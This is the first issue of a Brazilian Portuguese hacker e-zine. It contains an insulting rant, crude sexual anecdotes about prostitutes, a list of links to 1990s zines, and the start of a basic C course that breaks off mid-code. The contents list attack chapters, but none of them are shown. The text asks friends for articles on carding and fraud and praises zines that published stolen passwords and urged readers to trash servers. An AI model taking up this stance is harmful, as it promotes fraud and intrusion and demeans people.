ZINES — underground e-zine archive source
text size: CRT glow:
~/BRAZILIAN/C.O.D.E/CODEx00
===============================================================================
===============================================================================
||XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||
||XXXXXXXXXXXXXXXXXXX     VIPER CORP APRESENTA        XXXXXXXXXXXXXXXXXXXXXXX||
||$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$||
||$$$$$$$$$[[[+ ==================================================     +]]]]$$$$$$$$$$$$||          ||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                 -[+]--------------------------------[+]-                         +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                        C.O.D.E                                                 +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+             COMPUTADORES - ORGASMO - DESTRUIÇÃO - E-ZINES    +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                  [As 4 coisas que eu mais gosto na vida]                         +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                 -[+]--------------------------------[+]-                          +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                [AINDA NÃO TENHO UM BANNER]                        +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                MANDE SEUS ASCIIs PARA <B-FOX@BOL.COM.BR>         +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+                                                                                                                       +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ ==================================================== +]]]]$$$$$$$$$$$$||          ||XXXXXXXXXXXXXXXXANO 1 - Nº00  1/1/2008 BY 6_BL4CK9_F0X6 XXXXXXXXXXXXXXXXXXX||
||XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||
===============================================================================
===============================================================================           
                           
                             [+ ======X============X===============X===== +]
                                                                         INDICE 
                             [+ ======X============X===============X===== +]
        
              
############################################################################################                   [Uma grande parte dos capitulos desta primeira ediçao da CODE foram escritos originalmente]
     [para o maldito forum Darkers no qual fui banido, dae resolvi escrever uma zine com meus txts que escrevi la] 

 #include <x00. Pra começar reeves......................................................................................./6_Bl4ck9_f0x6 
 #include <x01. Frases do dia................................................................................................/6_Bl4ck9_f0x6
 #include <x02. Palavras do autor........................................................................................../6_Bl4ck9_f0x6
 #include <x03. Pedidos para os camaradas.........................................................................../6_Bl4ck9_f0x6
 #include <x04. Introducao a Zine>......................................................................................../6_Bl4ck9_f0x6
 #include <x05. ESPECIAL C.O.D.E [Zines de ontem e de hoje]........................................../6_Bl4ck9_f0x6
 #include <x06. Curso de linguagem C.................................................................................../6_Bl4ck9_f0x6
 #include <x07. Entendendo o Three Way Handshake.........................................................../6_Bl4ck9_f0x6
 #include <x08. Tunelando conexões - Port redirect - Criando ponte para invasoes................/6_Bl4ck9_f0x6
 #include <x09. Metasploit Unix>........................................................................................../6_Bl4ck9_f0x6
 #include <x10. Entendendo o Smurf...................................................................................../6_Bl4ck9_f0x6
 #include <x11. The king of calculators................................................................................../6_Bl4ck9_f0x6
 #include <x12. BackDoor Camuflagem for avast! antivirus>................................................../6_Bl4ck9_f0x6
 #include <x13. Humor Hacker - Entrevista com Cheat Struck>............................................./Cheat Struck
 #include <x14. Configurando o ettercap em modo shell e Hijacking de HTTP......................../6_Bl4ck9_f0x6 
 #include <x15. The End........................................................................................................./6_Bl4ck9_f0x6 

############################################################################################

----- C4p1Tul0 00                              

                                [+] X======================================X +]               
                                                        PRA COMEÇAR  REEVES 
                                [+] X======================================X +]

"REEVES" quero sinceramente que voce..............VA TOMAR NO CUUUUUUU SEU FILHO DA PUTA!!!!!

 
Meu Deus!!! E agora, eles tem o meu IP e nao vao ter piedade, Reeves!!! Tenha piedade!!. Ô mundo crueu, vou me matar. 
  
                          [ Traduçao para a palavra raposa segundo o dicionario aurelio: ]

                            [Mamifero Carnivoro, pessoa manhosa, "esperta", "velhaca"]

Cai na real reeves, bah! Voce acha mesmo que apareceria com meu IP real no forum depois do começo desse clima tenso? Noops, nem a pau, vao fazendo D.D.O.S ae na minha ponte galera, ou melhor, na minha dupla ponte Huahauh Meu PC ta aqui, vem buscar ele reeves]

                                                      Ja ouviram falar no Proxy Hunter? 
                                             E esse mesmo, (lembra do Kevin? o melhor do mundo)
                 Pense bem antes de voce atacar meu suposto IP, voce pode ter serias dores de cabeça seu verme nojento


Estava na porra do darkers para aprender...E isso mesmo que voce leu:

APRENDER!!!!!!!!


naum sou o Linus torvalds nem o Kevin David M. ( to chegando la voodoo e Andre Amorim eheh) , ah! e o #phobia realmente se acha um guro nem sabendo o que é um proxy? ou era apenas ironia? Acho que ta mais para a primeira opçao. Como ja falei, so queria postar meus topicos e "aprender", so isso, afinal de contas que tipo de cara espelha um forum todo (capivara warchalking) para passar um mes lendo ele offline sem comer e sem dormir direito, sem fazer mais nada apenas para aprender sobre wirelles? Se estava nessa droga de forum é porque tenho fome de conhecimento, se sou detestado é porque sempre tem um idiota falando besteira e eu respondo a autura, pô galera, um pouquinho de compreensao ae. Que tipo de idiota baixaria o site do morimoto e todos os seus e-books com a esperança de ser melhor do que ele? Que tipo de mula le zines da THC (em alemao) com um puta dicionario na frente traduzindo cada palavra so para aprender? Que tipo de imbecil perderia tempo em um forum que as pessoas o detestam? Eu sou o idiota, estava querendo ajudar, foi por isso que nao quiz expor meu verdadeiro nick, seria criticado pelo resto da vida, por nao aguentar malditos lammers.

Sou apenas um garoto de 18 anos que tem muitos idolos, todos mechem com informatica, nunca fui um garoto normal, daqueles que sao fas do ronaldinho e tal, ao contrario de muitos admiro um cara quando ele é bom, faço questao de dizer: 

Esse cara e melhor que eu.

Isso é um incentivo para mim, primeiro eu reconheço e depois tento correr atras, fico facinado com o gosto por coisas tecnicas que o drk tem, quase chorei quando li o seu artigo sobre chipsets. Pessoal, nao quero encrenca com voces, so queria que "nesse forum", todos me respeitasem como nos "outros que participo". Mas vi que nao da, repetindo: 

"REEVES" quero sinceramente que voce..............VA TOMAR NO CUUUUUUU SEU FILHO DA PUTA!!!!!


----- C4p1Tul0 01

                             [+] X======================================X +] 
                                                                FRASES DO DIA
                             [+] X====================================== X+] 


         
 "O pinto piou em baixo da pia. Ou era de baixo?                   "Redes Wireless é cú de bebo"
                                       - Seu Antonio "Bebado"                                       - 6_Bl4ck9_f0x6 

 COM na verdade é um exe?                                                  Quanto mais conhecimento voce tiver
                                    Ser nao identificado                             Mais balas tera no tambor do revolver      
                                                                                                                                      Anonymous

  "E' soh da uma sumidinha e o povo ja pensa que 
    nos tamo preso... =)" 
                                                   - Cheat Struck      
                                                                                                              "Nao cometam os mesmos erros que cometi.          "So pra preencher espaço"                                                                      Esse negocio de ser hacker pode parecer                                        6_Bl4ck9_f0x6                                                               excitante no principio, mas depois, quando
                                                                                                               voce avalia o que fez, se lembra que so tem
Essa noite nao, queria eu tenho um modem                                              uma vida para viver"
                                              -Adam                                                                                              - Kevin Mitnick
                                                              

----- C4p1Tul0 02
                                    [+ ======X============X===============X===== +]
                                                                 PALAVRAS DO AUTOR
                                    [+ ======X============X===============X===== +]
   


                                Gostaram do indice? Eu chamo isso de artes plasticas Huahauh 
                       Voces nao acreditariam se eu falase que aqui na minha cidade tem gente que derrete
             Garrafas de refri (plastico) de dois litros para vender pros gringos (arte) Huahuhuah!! a peso de ouro.
                     
Na minha cidade existem belas prostitutas, muito belas mesmo, sao da elite hauhauh, ficam la no calçadao da praia sentadinhas nos bancos esperando algum alemao olhar pra elas. Eu mesmo um dia desses estava andando de patins com uns amigos e afim de pegar umas prostitutas, dae cheguei em uma delas e disse:

Oi mossa, quanto que e o programa?

Ela olhou pra mim e disse:

Como e meu amigo? Voce esta me perguntando o que? 

Ops, puta errada Hauhauhauhauh!!!!

A coisa ta tao feia aqui cara, que ninguem sabe mais nem distinguir mulher de verdade de puta, Fortaleza ta foda. Nao existe coisa melhor que comer uma puta "da elite", mesmo sem grana, sei la porque, deve ser porque eu nao tenho cara de alemao e sim de bandido com esse meu cavanhaque, e mulher gosta de bandido, as almas se identificam (puta com bandido Huahau) sabe. Sempre quando to de bobera vou dar uma vouta de patins la no calçadao com meus camaradas daqui, dae um dia desses cheguei num puta e disse:

Moça... desculpa, mas tu e boa d+ e eu vou direito ao ponto.

Diz pra mim se tua e puta ou santa. hauhauh!!! 

Felizmente essa era puta, muuuuuuito gata, ce e loco tio, muito linda msm. Dae levei ele prum motelzinho de quinta aqui perto e fiz o que o meu extinto de macho manda. Cara, quando voce pega em uns peitoes daquele vei, voce ate esquece que tem computador....ta bom, num e tao facil assim esquecer....mas da uma ligeira sensaçao de esquecimento do mundo da informaçao. Meti a mao naqueles peitoes e fecheio o olho, puta merda, voce se sente o Linus torvalds (um de meus maiores idolos).  Vamos continuar com a zine, ja deixei voces com agua na boca d+, se vinherem para Fortaleza algum dia gostaria de bater um papinho com os leitores da minha zine e apresentar meus amigos daqui, e obvio.... que vamos comer muitas putas da "elite", so vai se for da elite caras, as putas de 5 categoria num e minha praia, hauhauha Essas putas de posto sao cheias de doença e normalmente sao feias, mas as da elite alem de serem "gatas", "gostosas", "experientes" e "limpinhas", ainda tem muita grana pra bancar uma cerveja gelada pra gente na praia Hauhauhauh!!  Tem uma puta aqui que se apaixonou por uma amigo meu, putz, ta feito... Mas tem um problema.... ele tem um modem (num quer nem saber) Huahuhuah.....

                                                                                                                 Bl4ck - Um bom conhecedor de putas    

----- C4p1Tul0 03

                              [+ ======X============X===============X===== +]
                                                     PEDIDO PARA OS CAMARADAS
                              [+ ======X============X===============X===== +]


Cloudy, 

Quero tua ajuda ae pra fazer o site da zine cara, material pra escrever e que nao falta por isso essa zine vai longe, gostaria que tu escrevese ae algum material sobre bots tambem véi. Tenho conta em varios hosts, sem propaga nem nada, so o site da zine. Ah! e se der tambem da um geito de entrevistar o drk "do forum" ehhe, mas antes pergunta pra ele se ele ta com raiva de mim, ÔÔÔÔÔ povo pra gostar de ter raiva de mim hauhauhauh!!! 

Milorde,

(puta nick tosco, te que ficar te chamando de milorde é foda cara hauhau)

Escreve ae algum texto sobre carder vei, ou estelionatarismo hauah (essa palavra existe?), acredito que o cara que fudeu alguns malucos la no forum invaders tenha capacidade de fazer tutos mais show de bola que aqueles pdfs que li. Da preferencia pra carder viu cara :-).  

MixMaster, 

Escreve ae alguma coisa sobre "Macro" cara, tu manja pra caraio vei, me ajuda ae, sei que tu e ocupado, mas arruma um tempim ae, a galera precisa de voce :-).

N1N4, 
  
Ainda ta com raiva de mim? Se nao tiver escreve ae aquele velho artigo sobre Cross Site Scripting  que tu num manja nada pra zine, e por favor:

Desculpa!!!!  eu num quiz dizer aquilo, desculpa, sou um trouxa mesmo. 

Marcos, 

Sera que nao rolaria uma entrevista contigo naum? Eim, Eim? O cara mais injustiçado do mundo, um dos melhores do Brasil e por isso um dos mais criticados. Prometo fazer perguntas inteligentes e que serao de interesse para todos, to de saco cheio de ouvir lammers dizendo que voce nao entende nada HauhUhauh!!! Da pra acreditar nisso? hauhauahuh!!! Prepara ae um bom tempo porque vai rolar muitas perguntas maneiras ;-) 

Voodoo,

se algum dia voce bater o olho nesse zine escute o meu apelo:

Entrevista ae cara!!!!!! 

Por favor veio, sou seu fa number one ehehhe. Quebra esse galho ae pra esse lammer aqui, qualquer coisa mail me :-) 



----- C4p1Tul0 04   Introdução a zine 
            
Fiz a C.O.D.E para tenta trazer outra vez os tempos de ouro das zines (a decada de 90) para o seculo 20, apesar de não ter participado da sena hacker desta década gosto muito de ler as zines deste periodo como a zine underground "Axur 05" a "RwX", "Phone 9", "NearZ", "Hack 'n Phreak", etc. Era maravilho quando existiam briga entre os grupos, quando um dos grupos escrivia mal sobre o outro e vice-versa em suas zines, sem contar que as zines escreviam senhas hackeadas da galera em suas edições como senhas de FTP, HTTP form, e até mesmo de SSH e telnet, além de dar as senhas mostravam como entrar nos servers já invadido "por eles" e colocavam varias informações úteis para os leitores. 

Enfim, para quem estiver lento esta zine faço um apelo: por favor continuem o que a rapaziada da decada de 90 começaram, existem apenas algumas zines daquele tempo sendo escritas hoje, isso é uma pena, pois as mesmas sempre passaram boas informações e artigos interesantes. Vamos fazer da nossa decada, a decada de ouro para os futuros hackers brasileiros, não vamos deixar morrer a sena hacker Brasileira. Naquele tempo se um host hospedava um site hacker que estava supostamente representando perigo, os caras do HO mesmo o tiravam do ar, e os caras se vingavam e tal e postavam varias brejas para os leitores entrarem no tal servidor e detonarem tudo lá, antes era mais emocionante participar da sena hacker, mas infelizmente hoje em dia os caras não constumam relembrar o passado, esta tudo voutado ao modismo, os porcos dos lammers roubaram a sena e vivem de plagio.  

Postei em meu site varias zines para vocês comprovarem o que eu estou falando (para quem não é desse tempo), os links vou passar mais adiante, vocês vão ficar abismados em saber como a sena hacker era forte nesse tempo, você vão se sentir nesta decada e vão ver que muitos hacker de hoje não passavam de script kiddies desta época escrevendo suas zines. O cara que criou a sena hacker no Brasil se chama Derneval R. R. da Cunha com sua zine barata eletrica que é uma das poucas zines de ontem que ainda está sendo escrita hoje. 

A C.O.D.E é uma zine dedicada a rapaziada que ta começando, não não, não me interprete mal, não quiz dizer lammers, "quiz dizer a rapaziada que ta começando", existe uma grande diferença entre lammers e bgners, os lamas são a escoria da sociedade, enquanto os bgners são aqueles caras que são interesados que não gostam de sair falando pra todo mundo que é hacker apenas porque aprendeu a usar um keylogger, com o pouco que sabem não costumam sair fazendo merda. Um exemplo de lammer é aquele idiota que acaba de saber pra que o nessus serve e sai varrendo hosts como o do bando do Brasil e YOUTUBE, detesto lammers, tenho nojo de lammers e se você for um lammer está convidado a deletar essa zine, seu lixo nojento.

A Zine tem muito material F0r y0u bgner, espero que essa zine lhe ajude a aprender mais, pois escrevo ela unica e quase exclusivamente para passar conhecimento para você, porque gosto muito de ser ajudado e porque não ajudar alguém, não é mesmo?  Enfim, a zine vai disponibilizar especiais sobre diversas linguagens de programação em que toda edição eu colocarei uma continuação até terminá-la (isso que dizer que a zine pretende ir lonje), a primeira linguagem abordada é o perl, mas esperem ae, 

estava tao afoito para lançar a primeira edicao da code que nem terminei, mas na proxima eu prometo :-) 

na proxima edição abordarei umas paginas sobre variaveis em perl e algumas outras coisinhas, perl e uma linguagem facil de ser absorvida pela massa.  Também to escrevendo ae um curso de MS-Windows (melhor que o difunto do DOS, se algum filho da puta falar de DOS perto de mim vai levar um sopetao na cara) pra rapaziada interesada, e um curso de C para quem ja começou a pegar a coisa, pois nao tenho saco de começar do inicio, mas nessa ediçao a primeira parte ta muito explicativa eheh. O resto deixo vocês descobrirem por si só, boa leitura galera ;-)

6_Bl4ck9_f0x6
Email- b-fox@bol.com.br                                      
MSN  - ratao666@hotmail.com 



----- C4p1Tul0 05

                                [+ ====================================== +] 
                                                         ESPECIAL C.O.D.E 
                                                       Zines de ontem e de hoje 
                                [+ ====================================== +] 
        
Galera, gostaria de dizer que não tenho todas as edições da maioria das zines citadas, pois uma grande parte é muito dificil de serem encontradas, por isso se você tem edições seguintes das descritas aqui por favor me mandem por email os links (b-fox@bol.com.br), eu agradecerei pois sou um grande colecionador de zines hacker e preacker, tenho zines de diversos paises, mas vou postar links apenas para as zines brasileiras.Vou começar postando ae o link do site do pessoal da thebug magazine, que é uma zine feita pelo pessoal das antigas e tem muito mateiral bom, também é uma zine que tem como meta trazer os tempos de ouro do hacking brasileiro. 

[ --- The Bug! Magazine                         

                    _____ _              ___               _ 
                   /__   \ |__   ___    / __\_   _  __ _  / \
                     / /\/ '_ \ / _ \  /__\// | | |/ _` |/  /
                    / /  | | | |  __/ / \/  \ |_| | (_| /\_/ 
                    \/   |_| |_|\___| \_____/\__,_|\__, \/   
                                                   |___/ 

                      [ M . A . G . A . Z . I . N . E ]


Data de lançamento: xx /xx / 2005
Link para download das ediçoes: www.thebugmagazine.org


Porque resolveram escrever esta zine:


                             *** Editorial de Lancamento ***
                                    THE BUG MAGAZINE


[--- Por que mais outra zine?

   Apos diversas dificuldades e um longo periodo sem atividade, o rfdslabs e
o Gotfault tomam a dianteira do que pretende-se resgatar uma das melhores epo-
cas do hacking no Brasil, a epoca das zines. Baseado nesse contexto resolvemos
lancar a nossa propria revista eletronica, a The Bug! Magazine. Uma publicacao
que pretende atingir o publico ligado a "hacking" e seguranca da informacao com
publicacoes, na medida do possivel, periodicas num intervalo de 6 meses.

   A ideia principal do Gotfault e rfdslabs e' semear o conhecimento e crescer
a cena hacker nacional.  O hacking no Brasil teve o seu auge em 97/98/99 com
uma serie de zines, listas e grupos comprometidos a estudar e divulgar as
ideias do ramo da seguranca da informacao, o mais interessante/excitante da
computacao.

           ==================================================================
    
       [Essa é das antigas e é underground, por isso você tera informaões de peso]
  [Minha preferida, se tiver mais numeros manda pra mim cara, por favor]
       [Eu acho que tenho todas, porque tenho uma zine coletania chamada axur best (melhor do axur) que tem muuuitas paginas, nunca contei as ediçoes, mas manda ae pra mim :-) 
       
                         -aa                                                         
 -a-a   -x   -x -u   -u  -r -rr      -000  -55555                 
 -a -a   -x -x  -u   -u  -r-r      -0    -0-5                      
 -a a-a    -x   -u   -u  -rr       -0    -0-5555                     
 -a   -a  -x -x -u   -u  -r        -0    -0    -5                
 -a    -a-x   -x -uuu uu -r          -000  -5555                       
             
     -- = = [AXUR 05 - DARK SIDE HACKERS - BRAZIL] = = --
      ~~~~ ~~ ~ ~~~~ ~~~~ ~~~~~~~   ~~~~~~
  

axur0500 -------------------- >  http://www.hunterhacker.xpg.com.br/axur0500.zip
axur0501 -------------------- >  http://www.hunterhacker.xpg.com.br/axur0501.zip
axur0502 -------------------- >  http://www.hunterhacker.xpg.com.br/axur0502.zip
axur0503 -------------------- >  http://www.hunterhacker.xpg.com.br/axur0503.zip
             
           ==================================================================
         
         [RwX - Das antigas, muito maneira]

:::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`:.:`""::"`````"::'"```'.:::::
::::: .g#S$$$$$S#n  .g#S$$     $$S#n. $$$S#s s#S$$$ :::::
::::: $$$$$$ $$$$$  $$$$$$ $$$ $$$$$$ .  $$$ $$$   .:::::
::::: $$$$$$g$$$$$. $$$$$$ $$$ $$$$$$ :'  $$g$$   .::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$ $$$$$$ ' $$$$ $$$$  ':::::
::::: $$$$$$  $$$$$ $$$$$$.$$$.$$$$$$ $$$$$ . $$$$$ :::::
::::: $S$$$$   $$$$ `S$$$$$$$$$$$$$S'.`S$$  :  $$S'.:::::
:::::.......:.....:::.............:::....:::....:::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::

rwx-0 -------------------- >  http://www.hunterhacker.xpg.com.br/rwx-0.zip
rwx-1 -------------------- >  http://www.hunterhacker.xpg.com.br/rwx-1.zip
rwx-2 -------------------- >  http://www.hunterhacker.xpg.com.br/rwx-2.zip
rwx-3 -------------------- >  http://www.hunterhacker.xpg.com.br/rwx-3.zip
rwx-4 -------------------- >  http://www.hunterhacker.xpg.com.br/rwx-4.zip
rwx-5 -------------------- >  http://www.hunterhacker.xpg.com.br/rwx-5.zip
rwx-6 -------------------- >  http://www.hunterhacker.xpg.com.br/rwx-6.zip

           ==================================================================
    
     P h o n e 9 (c) 1 9 9 8  p r o d u c t i o n s
     reg - (r) none rights reservaded.

                            __                                   
         __/\______\ \_  ________   ________    _______ ___/\_
         \__      //   \/        \__\___   /____\__   _/  _   \
         //   --  /  [-]\   __/   \    /_     /  /_____\___.  /
       _/     ___/___/   \_     __/\____/    /______   /__/ //
       \/----/      /_____\\___/      //____/     /____\____/
           [c]  P h o n e 9 (c) p r o d u c t i o n s.


 phone9-00 -------------------- >  http://www.hunterhacker.xpg.com.br/phone9-00.zip
 phone9-01 -------------------- >  http://www.hunterhacker.xpg.com.br/phone9-01.zip
 phone9-02 -------------------- >  http://www.hunterhacker.xpg.com.br/phone9-02.zip
           ==================================================================
   
                OS EDITORES DESTA ZINE SAO HACKERS DE SANGUE PURO
 
                                   UNDERGROUND PURIIIISSSSSIIIMOOOO!!!

               +-+-+-+-+-+-+-+-+-+-+----+-+-+-+-+-+-+-+-+-+-+-+
                Este documento pode conter informacoes ilegais 
                ou somente para fins *EDUCATIVOS*. Se  usa-las 
                para *OUTROS* fins a responsabilidade sera sua 
               +-+-+-+-+-+-+-+-+-+-+----+-+-+-+-+-+-+-+-+-+-+-+
 
     
=-= Near(Z) =-=-=-=-= TheGhostObtruder =-=-=-=-= TheRevenge =-=-=-=-=-=-=-=-=-
 00 ³ú úúú.úúúúúú úú.ú úúúúú úú.úúúú ú.úúúú.úúúú úúúú.úúú úúúú.úúúú ú.úú     
ÄÄÄͼú.úúú úÅXÅxú .úú `úúú,ú ú.úú úúúú,úúúú úú.ú.ú.úúú úú,úúú`úú úú.úúúúú    
     úúú ,úúxÅXÅxúúúú.úÅXÅúúú úúú.úú úúú úúúXÅxÅxúúúú úúú.úúú úúú.úúúú.úúú   
  úúúú.úú.úúÅxÅxÅXú. úúxÅxúúúÉÊÍËÍÊÍËÍÊú úÅxÅxÅxÅXÅúúúÎÁÍÂÍÁÍ¿úúú., úúúúú    
    . úúúúúúXÅxúxÅxú.ú ÅxÅúú͹. .úú ú.úúúÅxÅú .ú ÅxÅúÄÅÄ.úú.úÌÄú. ú`ú .úúúúú 
  .úúúúúú .úÅxÅ`úXÅx úúXÅxú.úÌÍú.ú,ú.ú úúxÅX,úú.úxÅXú.Ìú., úúÅÄúúúú ú.,úúú   
   ú.úú, úúúxÅXúúúxÅXú.ÅxÅúú͹úúúúúúú. úúÅxÅúú. úÅxÅúÄÅúú .úúÌÄú`úú úú úúú.úú
    úú úú.úúÅxÅúú.úxÅxúxÅXúú.ÌÍÊÍËÍÊúú.úúxÅxÅXÅxÅXÅxúúÎÄÍÂÍÁÂÅúú úú.ú úúúú   
 úúúú.úú úúúxÅxú úúúXÅxÅxÅúú.ÌÍúú .ú úúúúÅXÅxÅxÅxÅxÅúÄÅ `úú ÌÄú.úú,úú        
   úúúúú, úúÅXÅúú.ú úxÅXÅxúú͹. ú.úúúú.úúxÅxú .úúxÅXúúÌÄúú,úÅÄ` ú.úú         
       úú.úúxÅxú`ú ,úúxÅxÅ`ú.ÌÍú`úú,.úúúúÅxÅú`ú.úÅxÅúÄÅú úúúÌÄú.úúú úú.ú     
   úúú.ú úúúÅXÅ ú.úú .úxÅXúúúÈËÍÊÍËÍÊÍËúúXÅx,.ú úXÅxúúÌÄúú,úÀ¿úúú.,úúú.úú    
     úú,. úúúú.úú ú,úúú.úúúúúú .úúú` ú.úú úúúú.úúúúúú ú.úúúúúú`úúúúú.        
   úú.úú ú úú.úú úú.úúúú ú. úú ú.úú,úú úúú.úúúúú.ú úúú úúú.ú úúúú.úúúú       
=-= Near(Z) =-=-=-=-=-=-=-=-=-= issue 00 =-=-=-=-=-=-=-=-=-=-=-=-= Near(Z) =-=
                                                 
                                                                                                
          
 nz00 -------------------- >  http://www.hunterhacker.xpg.com.br/nz00.zip
 nz01 -------------------- >  http://www.hunterhacker.xpg.com.br/nz01.zip
 nz02 -------------------- >  http://www.hunterhacker.xpg.com.br/nz02.zip
 nz03 -------------------- >  http://www.hunterhacker.xpg.com.br/nz03.zip
 nz04 -------------------- >  http://www.hunterhacker.xpg.com.br/nz04.zip
 nz05 -------------------- >  http://www.hunterhacker.xpg.com.br/nz05.zip
 nz06 -------------------- >  http://www.hunterhacker.xpg.com.br/nz06.zip
 nz07 -------------------- >  http://www.hunterhacker.xpg.com.br/nz07.zip
 nz08 -------------------- >  http://www.hunterhacker.xpg.com.br/nz08.zip
 nz09 -------------------- >  http://www.hunterhacker.xpg.com.br/nz09.zip
 nz10 -------------------- >  http://www.hunterhacker.xpg.com.br/nz10.zip
 
           ==================================================================
                                  [Agosto de 1997] 
 °°°°--------------------------------------------------------------------°°°°
 ±±±±                                                                    ±±±±
 ²²²²                                                                    ²²²²
 ÛÛÛÛ                H A C K       N'      P H R E A K                   ÛÛÛÛ
 ²²²²                                                                    ²²²²
 ±±±±                                ZINE                                ±±±±
 °°°°--------------------------------------------------------------------°°°°
     
    
 hacphr00 -------------------- >  http://www.hunterhacker.xpg.com.br/hacphr00.zip
 hacphr01 -------------------- >  http://www.hunterhacker.xpg.com.br/hacphr01.zip
 hacphr02 -------------------- >  http://www.hunterhacker.xpg.com.br/hacphr02.zip
 hacphr03 -------------------- >  http://www.hunterhacker.xpg.com.br/hacphr03.zip
 
             ==================================================================
                            [Data da primeira edição /03/2000]

   _ __ ___________________________ __________________________  ____
   \   ______ _ _______ _______     \___   _______by_Cheat_Struck__/
   /  /_ ____ ________ _____  /        /  /___  ____  ____  ____
  /     /  _  \__   __/  _  \/  /   /_   /  _ \   _ \     \   _ \
    /     _   /    /    _   /  /__   /  /  _  /  _  /  _/ /  _  /
 __/     / __/    /    / __/______\____/  /  _\ /  _\____/  /  _\
       )/       )/   )/                 )/    )/          )/
       '        '    '                  '     '           '

f3-00 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-00.zip
f3-01 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-01.zip
f3-02 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-02.zip
f3-03 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-03.zip
f3-04 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-04.zip
f3-05 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-05.zip
f3-06 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-06.zip
f3-07 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-07.zip
f3-08 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-08.zip   
f3-09 -------------------- >  http://www.hunterhacker.xpg.com.br/f3-09.zip    
    
Essas são apenas algumas zines galera, obviamente que postarei muito mais links de boas zines da decada de 90 para vocês nas proximas edições. Espero que tenham ouvido o meu apelo com relação a desenvolver novas zines, pois eu faço questão de divulgalas no meu site, estou pensando eu mudar de host, pois o XPG tem muitas propagandas dae num rola vocês ter que ficar vendo muitos banners que num é do site, sem contar que o espaço pra pagina do site fica meio pequeno pra tantas propagandas, estou pensando em ir para a webng pois não tem propaga. Atualmente não estou escrevendo mais para o meu site e não estou postando mais conteúdo, você vão ver ele do jeito que esta por um bom tempo. Vou me dedicar apenas a C.O.D.E de agora em diante, mas se eu resolver mesmo mudar de host eu vou começar a atualizar ele. 

----- C4p1Tul0 06

                          [+ ======X============X===============X===== +]
                                            CURSO DE LINGUAGEM C PARTE 1
                          [+ ======X============X===============X===== +]


Bem galera, aqui e a primeira parte do curso de C, nao vou falar da historia do C, nem dessas babozeiras que voce esta acostumado a ler por ae, pois a intençao aqui é botar a mao na massa e explicar com se fazer a coisa e nao mostrar tecnicamente como a coisa acontece no sistema.....?.....Bah! Nao sei explicar direito, mas vamos la. Gostaria de dizer que este curso é o basico e é destinado a quem ja tem um certo conhecimento em C, e de vez em quando vou dar uma colher de cha para os iniciantes, ou seja, voce vera coisas de facil compreensao e muuuita explicaçao "algumas vezes". 

00 - Incluir o que?

Antes de voce declarar uma funçao em C (o que? nao sabe o que e funçao? Procura em outro lugar, aqui eu so ensino a botar a mao na massa) voce precisa primeiramente incluir ela no seu programa....dã....essas tais funçoes estao localizadas nas bibliotecas de cabeçalho ou headers (cabeçalho em ingles), caso nao inclua as bibliotecas que abrigam as funçoes, voce nao poderá usar tais funçoes, exemplo. 

Para incluir a funçao printf ("falarei log mais"), tu teras que fazer isso:

#include <stdio.h>     //Essa e a biblioteca de cabeçalho que guarda a funçao printf 

int main (void){
printf ("Oi");     //Funçao printf declarada, so pudi declarar essa funçao porque especifiquei la em cima o header stdio 
return (0);}
   
Para nos podermos utilizar a funçao printf nos temos que primeiramente "incluir" no nosso codigo a biblioteca que guarda essa funçao, resumindo: 

Tu so poderas declarar uma funçao se primeiramente incluir a biblioteca que guarda a funçao, sacou? 

vou repetir: 

Tu so poderas declarar uma funçao se primeiramente incluir a biblioteca que guarda a funçao!!! 

Para incluir uma biblioteca ou header, tu teras que escrever o seguinte:

#include <nome_da_biblioteca>

Repare no #include, é include mesmo pessoal, include significa incluir em portugues, nao se esqueça de colocar a tralha antes do include, assim o compilador vai saber o quando voce esta dalacrando o include. Agora repara la em cima na biblioteca stdio.h, pois é, essa é a biblioteca padrao do C, antes de começar qualquer programa em C tu teras primeiro que incluir esta biblioteca, uma grande parte das funçoes "mais usadas nos programas" está contida nesta biblioteca. Vamos agora  a uma traduçao deste header. 

Contraçao   Significado em ingles    Significado em Portugues  
std               Standard                     Padrao
i                   Input                           Entrada 
o                 Output                         Saida 
.h                .Header                        .Cabeçalho  

O h denominda um C Header File ou arquivo de cabeçalho em C, como o txt é um arquivo de texto por exemplo, entao vamos dar uma resumida aqui, stdio.h significa: Cabeçalho padrao de entrada e saida. Torno a repetir, antes de começar escrever seus codigos inclua esta biblioteca, caso contrario nao poderas incluir as funçoes mais importantes do C (falarei logo mais) que estao incluidas neste cabeçalho, e para incluir use o #include <... :-)
 
Analisando outra vez o codigo
 
#include <stdio.h>      //Incluir no codigo a biblioteca stdio.h que contem a funçao printf      

int main (void)
{
